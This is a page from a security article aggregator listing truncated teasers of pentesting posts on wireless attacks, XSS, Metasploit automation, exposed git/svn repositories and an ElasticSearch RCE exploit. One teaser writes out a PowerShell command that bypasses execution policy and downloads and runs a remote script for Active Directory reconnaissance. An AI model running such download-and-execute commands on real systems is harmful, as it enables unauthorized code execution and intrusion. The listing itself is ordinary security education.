HackDig : Dig high-quality web security articles for hacker

WiNX: The Ultra-Portable Wireless Attacking Platform

When you are performing penetration tests for your customers, you need to build your personal arsenal. Tools, pieces of hardware and software are collected here and there depending on your engagements to increase your toolbox. To perform Wireless intrusion tests, I’m a big fan of the WiFi Pineapple. I’ve had one for years (model MK5). It’s not
Publish At:2017-09-29 02:25 | Read:115 | Comments:0 | Tags:Pentesting Security Social Engineering Hardware WiFi WiNX Wi

The Top 13 Information Security Conferences of 2017

2017 is finally here. You know what that means: another information security conference season is upon us. We couldn’t be more excited! Just like we did last year, we at The State of Security have assembled a list of the top 13 conferences in information security for 2017. We hope you’ll have the chance to attend at least one of these events this
Publish At:2017-01-11 12:55 | Read:1031 | Comments:0 | Tags:Off Topic Conferences CTF hacking Information Security pente

Finding and Exploiting Same Origin Method Execution vulnerabilities

Recently it came to my attention that it was possible to abuse JSONP callbacks using a vulnerability known as SOME – Same Origin Method Execution which can be used by an attacker to widely abuse a user’s trust between the web application and the intended flow of execution. For example, using the SOME attack it is possible for an attacker to trick
Publish At:2015-12-31 16:50 | Read:1397 | Comments:0 | Tags:exploitation Open Source pentesting pentura privacy security

[IRCCloud] History and Another XSS Bug Bounty

Personally, I have been a user of IRC since 2004 on some private networks and some other well-known ones such as Freenode. However, it was always inconvenient to have to set up an IRC Bouncer, so when IRCCloud came around, I was excited to try it and see if it provided me with a method of staying connected to all the required networks without having to downl
Publish At:2015-10-14 11:40 | Read:839 | Comments:0 | Tags:fuzzing infosec pentesting pentura security Software Vulnera

Fuzzing for Fun and Profit

So as you do, I was just looking around, manually fuzzing some Web Sockets requests, seeing if I could get any sort of XSS, Remote IRC Command Injection or SQLi mainly – ended up that I didn’t find much there that was worth noting. So I started seeing if their logic was all alright, so one of their requests looked similar to: {“_reqid”:1234, “cid”:5678, “t
Publish At:2015-10-13 17:40 | Read:914 | Comments:0 | Tags:exploitation fuzzing infosec pentesting pentura security Sof

Metasploit + VHOSTS in mass

Maybe this was a solved problem but I couldn't find a solution online. Problem #1: Metasploit RHOSTS takes the file parameter so you can pass in a list of ip ranges. It will also take hostnames as long as they resolve. If you have a giant list of stuff and one of them doesn't resolve then the RHOSTS won't load and you'll want to cry. Problem #2: Lots of proxy
Publish At:2015-08-18 12:10 | Read:895 | Comments:0 | Tags:Metasploit Pentesting resource scripts scripting

Does My Job Even Matter? A Dose of InfoSec Career Perspective

If you work in an enterprise defense role, chances are your day is comprised of coffee, email, meetings, crises, coffee, interruptions, coffee, and meetings (and, most likely, alcohol). The meetings seem useless and the interruptions unceasing. Your stress piles up while your family time dwindles, and you find yourself wondering at the end of the day (or dur
Publish At:2015-07-09 12:30 | Read:816 | Comments:0 | Tags:Featured Articles IT Security and Data Protection Informatio

Running System Commands Against Multiple SSH Servers with Fabric

Fabric is a python library to automate tasks. As the README says: Fabric is a Python (2.5-2.7) library and command-line tool for streamlining the use of SSH for application deployment or systems administration tasks. More specifically, Fabric is: A tool that lets you execute arbitrary Python functions via the command line; A library of subroutines (built on
Publish At:2015-04-09 00:25 | Read:839 | Comments:0 | Tags:automation Fabric OMG Python Pentesting

Running System Commands Against Multiple SSH Servers With Metasploit

Want: To run a command against multiple SSH servers and you want to use metasploit to do it. How: There doesn't exist a multi_ssh_exec type aux module to run commands. Luckily the ssh_login module creates a command shell session for you, on successful logins. You can use the builtin sessions functionality to run a command against all your (SSH) sessions. msf au
Publish At:2015-04-07 00:20 | Read:830 | Comments:0 | Tags:automation Metasploit Pentesting

DevOoops: Revision Control (git)

Exposed git resources is probably the most gruesome low2pwned issues out there right now. Leaving this exposed allows an attacker to potentially download the full source of the site along with any other files that are in the git repository. Ron's blog post on skullsecurity (see Resources) was my first exposure to the subject. I actually blogged about it back i
Publish At:2015-03-23 23:35 | Read:868 | Comments:0 | Tags:devops Pentesting

Metasploit and MSGRPC

I wanted to automate connecting to MSGRPC. I did find a few older tutorials on the subject: http://blog.spiderlabs.com/2012/01/scripting-metasploit-using-msgrpc-.html http://jumpespjump.blogspot.com/2013/05/metasploit-msgrpc-with-python-on-kali.html https://www.fishnetsecurity.com/6labs/blog/scripting-metasploit-python https://khr0x40sh.wordpress.com/2012/05/htt
Publish At:2015-03-16 15:35 | Read:849 | Comments:0 | Tags:Metasploit OMG Python Pentesting

ElasticSearch CVE-2015-1427 RCE Exploit

References: https://www.elastic.co/blog/elasticsearch-1-4-3-and-1-3-8-released/ https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/ http://www.theregister.co.uk/2015/03/10/elastic_search_vuln/?mt=1426090760048 Since the exploit is already out here [XiphosResearch github] and here [in a comment :-) ]
Publish At:2015-03-11 23:30 | Read:1030 | Comments:0 | Tags:devops elasticsearch Pentesting exploit

PowerShell-AD-Recon by PyroTek3

Found a couple of fun PowerShell enumeration scripts here: https://github.com/PyroTek3/PowerShell-AD-Recon C:\temp>powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PyroTek3/PowerShell-AD-Recon/master/Discover-PSMSSQLServers'); Discover-PSMSSQLServers" Processing XX (user and computer) accounts
Publish At:2015-03-09 23:25 | Read:1135 | Comments:0 | Tags:enumeration Pentesting post-exploitation powershell

DevOoops: Revision Control (Subversion)

Subversion 1.6 (and earlier): Check for .entries files. Walk svn chain to retrieve source. Example: http://somedomain.com/.svn/text-base/index.php.svn-base http://somedomain.com/.svn/entries Metasploit Auxiliary Module: auxiliary/scanner/http/svn_scanner msf auxiliary(svn_scanner) > run [*] Using code '404' as not found. [+] [1.2.3.52:80] SVN Entries file found. [*] [1
Publish At:2015-03-02 15:55 | Read:1194 | Comments:0 | Tags:devops Pentesting

The Evil CVE: CVE-666-666 – “Report Not Read”

I had an interesting discussion with a friend this morning. He explained that, when he is conducting a pentest, he does not hesitate to add sometimes in his report a specific finding regarding the lack of attention given to the previous reports. If some companies are motivated by good intentions and ask for regular pentests against their infrastructure or a
Publish At:2015-02-27 00:45 | Read:1043 | Comments:0 | Tags:Pentesting Security CVE Pentest Report
